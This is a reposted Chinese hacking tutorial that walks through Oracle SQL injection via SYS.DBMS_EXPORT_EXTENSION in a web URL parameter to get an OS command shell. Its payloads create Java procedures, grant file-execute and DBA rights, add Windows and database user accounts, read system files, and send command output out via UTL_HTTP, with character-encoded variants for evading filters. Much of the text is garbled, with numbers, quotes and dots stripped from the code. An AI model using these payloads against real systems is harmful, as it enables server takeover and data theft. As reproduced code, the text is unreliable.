知识大全犀利的oracle注入技术

Posted 2022-07-15 函数

篇首语：欠伸展肢体，吟咏心自愉。本文由小常识网(cha138.com)小编为大家整理，主要介绍了知识大全犀利的oracle注入技术相关的知识，希望对你有一定的参考价值。

　　介绍一个在web上通过oracle注入直接取得主机cmdshell的方法

　　以下的演示都是在web上的sql plus执行的在web注入时把select SYS DBMS_EXPORT_EXTENSION… 改成

　　/xxx jsp?id= and ′<> a ||(select SYS DBMS_EXPORT_EXTENSION… )

　　的形式即可 (用 a || 是为了让语句返回true值)

　　语句有点长可能要用post提交

　　以下是各个步骤

　　创建包

　　通过注入 SYS DBMS_EXPORT_EXTENSION 函数在oracle上创建Java包LinxUtil 里面两个函数 runCMD用于执行系统命令 readFile用于读取文件

　　/xxx jsp?id= and ′<> a ||(

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　create or replace and pile java source named LinxUtil as import java io *; public class LinxUtil extends Object public static String runCMD(String args) tryBufferedReader myReader= new BufferedReader(

　　new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) ); String stemp str= ;while ((stemp = myReader readLine()) != null) str +=stemp+ \\n ;myReader close();return str; catch (Exception e)return e toString();public static String readFile(String filename)tryBufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp str= ;while ((stemp = myReader readLine()) != null) str +=stemp+ \\n ;myReader close();return str; catch (Exception e)return e toString();

　　 ;END; ;END;– SYS ′ ) from dual

　　)

　　————————

　　如果url有长度限制可以把readFile()函数块去掉即

　　/xxx jsp?id= and ′<> a ||(

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　 ;END; ;END;– SYS ′ ) from dual

　　)

　　同时把后面步骤提到的对readFile()的处理语句去掉

　　——————————

　　赋Java权限

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <<ALL FILES>> execute );end; ;END; ;END;– SYS ′ ) from dual

　　创建函数

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String ; ;END; ;END;– SYS ′ ) from dual

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　create or replace function LinxReadFile(filename in varchar ) return varchar as language java name LinxUtil readFile(java lang String) return String ; ;END; ;END;– SYS ′ ) from dual

　　赋public执行函数的权限

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE grant all on LinxRunCMD to public ;END; ;END;– SYS ′ ) from dual

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE grant all on LinxReadFile to public ;END; ;END;– SYS ′ ) from dual

　　测试上面的几步是否成功

　　and ′<> ′||(

　　select OBJECT_ID from all_objects where object_name = LINXRUNCMD

　　)

　　and ′<>(

　　select OBJECT_ID from all_objects where object_name = LINXREADFILE

　　)

　　执行命令

　　/xxx jsp?id= and ′<>(

　　select sys LinxRunCMD( cmd /c net user linx /add ) from dual

　　)

　　/xxx jsp?id= and ′<>(

　　select sys LinxReadFile( c:/boot ini ) from dual

　　)

　　注意sys LinxReadFile()返回的是varchar类型不能用 and <> 代替 and ′<>

　　如果要查看运行结果可以用 union :

　　/xxx jsp?id= union select sys LinxRunCMD( cmd /c net user linx /add ) from dual

　　或者UTL_HTTP request(:

　　/xxx jsp?id= and ′<>(

　　SELECT UTL_HTTP request( ?a=LinxRunCMD: ||REPLACE(REPLACE(sys LinxRunCMD( cmd /c net user aaa /del ) % ′) \\n % A )) FROM dual

　　)

　　/xxx jsp?id= and ′<>(

　　SELECT UTL_HTTP request( ?a=LinxRunCMD: ||REPLACE(REPLACE(sys LinxReadFile( c:/boot ini ) % ′) \\n % A )) FROM dual

　　)

　　注意用UTL_HTTP request时要用 REPLACE() 把空格换行符给替换掉否则会无法提交 request 用utl_encode base _encode也可以

　　——————–

　　内部变化

　　通过以下命令可以查看all_objects表达改变

　　select * from all_objects where object_name like %LINX% or object_name like %Linx%

　　删除我们创建的函数

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　drop function LinxRunCMD ;END; ;END;– SYS ′ ) from dual

　　====================================================

　　全文结束谨以此文赠与我的朋友

　　linx

　　[email=li]li[/email]

　　======================================================================

　　测试漏洞的另一方法

　　创建oracle帐号

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　CREATE USER linxsql IDENTIFIED BY linxsql ;END; ;END;– SYS ′ ) from dual

　　即

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES(chr( )||chr( )||chr( ) chr( )||chr( )||chr( )

　　chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( ) chr( )||chr( )||chr( ) chr( ) ) from dual

　　确定漏洞存在

　　 <>(

　　select user_id from all_users where username= LINXSQL

　　)

　　给linxsql连接权限

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　GRANT CONNECT TO linxsql ;END; ;END;– SYS ′ ) from dual

　　删除帐号

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　drop user LINXSQL ;END; ;END;– SYS ′ ) from dual

　　======================

　　以下方法创建一个可以执行多语句的函数Linx_query() 执行成功的话返回数值 ″ 但权限是继承的可能仅仅是public权限作用似乎不大真的要用到话可以考虑grant dba to 当前的User

　　 jsp?id= and ′<>(

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　create or replace function Linx_query (p varchar ) return number authid current_user is begin execute immediate p; return ; end; ;END; ;END;– SYS ′ ) from dual

　　) and …

　　 jsp?id= and ′<>(

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE grant all on Linx_query to public ;END; ;END;– SYS ′ ) from dual

　　) and …

　　 jsp?id= and ′<>(

　　SELECT sys Linx_Query( SELECT FROM DUAL ) FROM DUAL

　　) and …

　　 jsp?id= and ′<>(

　　SELECT sys Linx_Query( declare pragma

　　autonomous_transaction; begin execute immediate

　　select from dual

　　 ; mit; end; ) from dual

　　) and …

　　多语句

　　SELECT sys Linx_Query( declare temp varchar ( ); begin select into temp from dual; select into temp from dual; end; ) from dual

　　创建用户(除非当前用户有system权限否则无法成功)

　　SELECT sys Linx_Query( declare pragma

　　autonomous_transaction; begin execute immediate

　　CREATE USER Linx_Query_User IDENTIFIED BY Linx_Query_User

　　 ; mit; end; ) from dual

　　================

　　以下的方法是先建立函数Linx_Query() 再建立 RunCMD ()

　　创建函数

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　create or replace function Linx_Query (p

　　varchar ) return number authid current_user is begin execute immediate

　　p; return ; end; ;END; ;END;– SYS ′ ) from dual;

　　如果有权限以下语句应该允许正常

　　select sys linx_query( select from dual ) from dual;

　　不然的话运行

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES( FOO BAR DBMS_OUTPUT PUT(:P );EXECUTE IMMEDIATE DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE

　　grant dba to 当前的User ;END; ;END;– SYS ′ ) from dual

　　创建包

　　SELECT sys Linx_Query( declare pragma

　　autonomous_transaction; begin execute immediate

　　create or replace and pile java source named LinxUtil ″ as import java io *;public class LinxUtil extends Object public static String RunCMD(String args) throws IOExceptionBufferedReader myReader= new BufferedReader(

　　new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) ); String stemp str= ;while ((stemp = myReader readLine()) != null) str +=stemp+ \\n ;return str; ; mit; end; ) from dual

　　创建函数

　　SELECT sys Linx_Query( declare pragma

　　autonomous_transaction; begin execute immediate

　　create or replace function RunCMD (p_cmd in varchar ) return varchar as language java name LinxUtil RunCMD(java lang String) return String ; ; mit; end; ) from dual

　　给权限

　　给用户SYSTEM执行权限

　　SELECT sys Linx_Query( declare pragma autonomous_transaction;begin dbms_java grant_permission( SYSTEM SYS:java io FilePermission <<ALL FILES>> execute );end; ) from dual

　　执行函数

　　select RunCMD ( cmd /c dir ) from dual

　　==================

　　================================

　　以下是无版

　　以下是各个步骤

　　创建包

　　通过注入 SYS DBMS_EXPORT_EXTENSION 函数在oracle上创建Java包LinxUtil 里面两个函数 runCMD用于执行系统命令 readFile用于读取文件

　　因为建立了两个函数转换为ascii后语句更长了注意提交时不要把换行去掉否则执行不成功的

　　/xxx jsp?id= and chr( )<>chr( )||(

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES(chr( )||chr( )||chr( ) chr( )||chr( )||chr( )

　　 chr( )||chr( )||chr( ) chr( ) ) from dual

　　)

　　——————————

　　赋Java权限

　　/xxx jsp?id= and chr( )<>chr( )||(

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES(chr( )||chr( )||chr( ) chr( )||chr( )||chr( )

　　chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )

　　 chr( )||chr( )||chr( ) chr( ) ) from dual

　　)

　　readfile函数的ascii版就不写了见谅

　　创建函数

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES(chr( )||chr( )||chr( ) chr( )||chr( )||chr( )

　　chr( )||chr( )||chr( )

　　 chr( )||chr( )||chr( ) chr( ) ) from dual

　　赋public执行函数的权限

　　select SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES(chr( )||chr( )||chr( ) chr( )||chr( )||chr( )

　　chr( )||chr( )||chr( )

　　 chr( )||chr( )||chr( ) chr( ) ) from dual

　　执行命令

　　/xxx jsp?id= and chr( )<>chr( )||(

　　select sys LinxRunCMD( cmd /c net user linx /add ) from dual

　　)

　　即

　　/xxx jsp?id= and chr( )<>chr( )||(

　　select sys LinxRunCMD(chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )||chr( )) from dual

cha138/Article/program/Oracle/201311/18679

知识大全 犀利的oracle注入技术

知识大全犀利的oracle注入技术